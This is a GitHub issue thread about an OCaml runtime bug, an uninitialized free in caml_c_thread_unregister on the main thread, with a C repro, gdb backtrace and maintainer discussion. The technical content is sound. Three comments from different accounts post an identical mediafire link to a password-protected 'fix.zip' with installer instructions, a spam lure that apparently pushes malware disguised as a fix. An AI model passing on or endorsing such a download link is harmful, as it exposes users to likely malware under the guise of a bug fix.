### ISSUE TITLE
Uninitialized free in caml_c_thread_unregister if you call it from the main thread

### ISSUE THREAD

**Issue by rwmjones** [ocaml/ocaml#13400]
This is distilled down from a very complicated bug report from [nbdkit OCaml plugins](https://gitlab.com/nbdkit/nbdkit/-/tree/master/plugins/ocaml?ref_type=heads).  Below is a very simplified case.

`hello.ml` contains:
```
let () = prerr_endline "hello"
```
`test.c` contains:
```
#include <caml/callback.h>
#include <caml/threads.h>

int
main (int argc, char *argv[])
{
  caml_startup (argv);
  caml_release_runtime_system ();
  caml_c_thread_register ();
  caml_c_thread_unregister ();
  exit (0);
}
```

Using [glibc tunables](https://www.gnu.org/software/libc/manual/html_node/Memory-Allocation-Tunables.html) we can get glibc to write a pattern over uninitialized pieces of memory, which reveals in this case that we free an uninitialized pointer (`th->signal_stack`):
```
$ ocamlopt.opt -g -output-obj -I +unix -I +threads unix.cmxa threads.cmxa hello.ml -o camlcode.o 
$ gcc -g -O0 test.c camlcode.o -I`ocamlc -where` -L`ocamlc -where` -lthreads -lunixnat -lasmrun -lm -o test
$ LD_PRELOAD=libc_malloc_debug.so.0 GLIBC_TUNABLES=glibc.malloc.check=1:glibc.malloc.perturb=42 gdb ./test
...
(gdb) bt
#0  __pthread_kill_implementation (threadid=<optimized out>, 
    signo=signo@entry=6, no_tid=no_tid@entry=0) at pthread_kill.c:44
#1  0x00007ffff7d34793 in __pthread_kill_internal (threadid=<optimized out>, 
    signo=6) at pthread_kill.c:78
#2  0x00007ffff7cdbd0e in __GI_raise (sig=sig@entry=6)
    at ../sysdeps/posix/raise.c:26
#3  0x00007ffff7cc3942 in __GI_abort () at abort.c:79
#4  0x00007ffff7cc47a7 in __libc_message_impl (
    fmt=fmt@entry=0x7ffff7e760a0 "%s") at ../sysdeps/posix/libc_fatal.c:132
#5  0x00007ffff7d279c9 in __GI___libc_fatal (
    message=message@entry=0x7ffff7fa4a71 "free(): invalid pointer")
    at ../sysdeps/posix/libc_fatal.c:141
#6  0x00007ffff7f9dc66 in malloc_printerr (
    str=0x7ffff7fa4a71 "free(): invalid pointer")
    at /usr/src/debug/glibc-2.40-3.fc41.x86_64/malloc/malloc.c:5774
#7  free_check (mem=mem@entry=0xd5d5d5d5d5d5d5d5)
    at /usr/src/debug/glibc-2.40-3.fc41.x86_64/malloc/malloc-check.c:228
#8  0x00007ffff7fa0111 in free_check (mem=0xd5d5d5d5d5d5d5d5)
    at /usr/src/debug/glibc-2.40-3.fc41.x86_64/malloc/malloc-check.c:215
#9  __debug_free (mem=0xd5d5d5d5d5d5d5d5) at malloc-debug.c:208
#10 0x000000000044fc85 in thread_detach_from_runtime ()
#11 0x000000000045004a in caml_c_thread_unregister ()
#12 0x00000000004020d0 in main (argc=1, argv=0x7fffffffe0d8) at test.c:10
```

I'll follow up with a pull request which contains a simple fix for this, but it's not clear to me if `caml_c_thread_unregister` should do nothing if called on the main thread?

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gadmm** [comment]
To which extent does the repro capture the original bug? I see several issues:
1. systhreads is not initialized (no call to `caml_thread_initialize`)
2. the example attempts to register the main thread as a c thread
3. the example attempts to register a thread that is already registered
4. the error code of `caml_c_thread_register` is not checked

**Comment by rwmjones** [comment]
> To which extent does the repro capture the original bug?

It's difficult to reproduce the original bug, but I described it over here:
https://discuss.ocaml.org/t/free-uninitalized-data-when-calling-caml-c-thread-unregister-on-the-main-thread/15198
It'd also be helpful to look at the plugin code itself:
https://gitlab.com/nbdkit/nbdkit/-/blob/dbe1dfadb6350402ee9aba41ee118349f252d673/plugins/ocaml/plugin.c

Part of the problem is that nbdkit starts lots of threads, and calls into the OCaml plugin on any of them (including on the program main thread, as appears to be happening here).  From the point of view of the OCaml plugin, it doesn't "know" when a new thread appears, nor does it "know" if the thread is the main thread.

Therefore the only solution we can really use is to call `caml_c_thread_register` at every call (this is cheap if the thread is already registered).  And in the close function when we know we'll not be called again, call both `caml_c_thread_register` at the beginning of that function and `caml_c_thread_unregister` at the end.

> I see several issues:
> 
>     1. systhreads is not initialized (no call to `caml_thread_initialize`)

It is initialized (by `caml_startup`).  Check the `threads_initialized` global in gdb when it crashes.

>     2. the example attempts to register the main thread as a c thread

The problem is there's no "is this the main thread?" API.  Ideally `caml_c_thread_register` & `caml_c_thread_unregister` would just detect this case and do nothing, if that's important.

>     3. the example attempts to register a thread that is already registered

See above.

>     4. the error code of `caml_c_thread_register` is not checked

The "error code" is unfortunately useless.  If the function returns `0` it can indicate either an error or that the thread is already registered and the function did nothing.  Since we have no way to find out if a thread is already registered, there's nothing useful we can do with the error code.

If there's really an error, maybe the function should return `-1`.

**Comment by gadmm** [comment]
Ok, thanks for checking re. `threads_initialized`.

The return value of `caml_c_thread_register` is indeed an error code. I don't think it is intended to be used on purpose to make `caml_c_thread_register` idempotent.

Could you have a thread-local variable to store whether you did `caml_startup` or `caml_c_thread_register` in the thread?

**Comment by rwmjones** [comment]
> Could you have a thread-local variable to store whether you did caml_startup or caml_c_thread_register in the thread?

Yes that would be possible.  I'll take a look at modifying the plugin that way.

**Comment by rwmjones** [comment]
@gadmm @gasche  I implemented the thread-local version here:

https://gitlab.com/nbdkit/nbdkit/-/merge_requests/59

It either exposes existing or causes new minor heap corruption which I don't understand.  If you have any suggestions that'd be helpful.

It's generally an example of code that uses the OCaml runtime in a non-trivial way which you might find interesting.
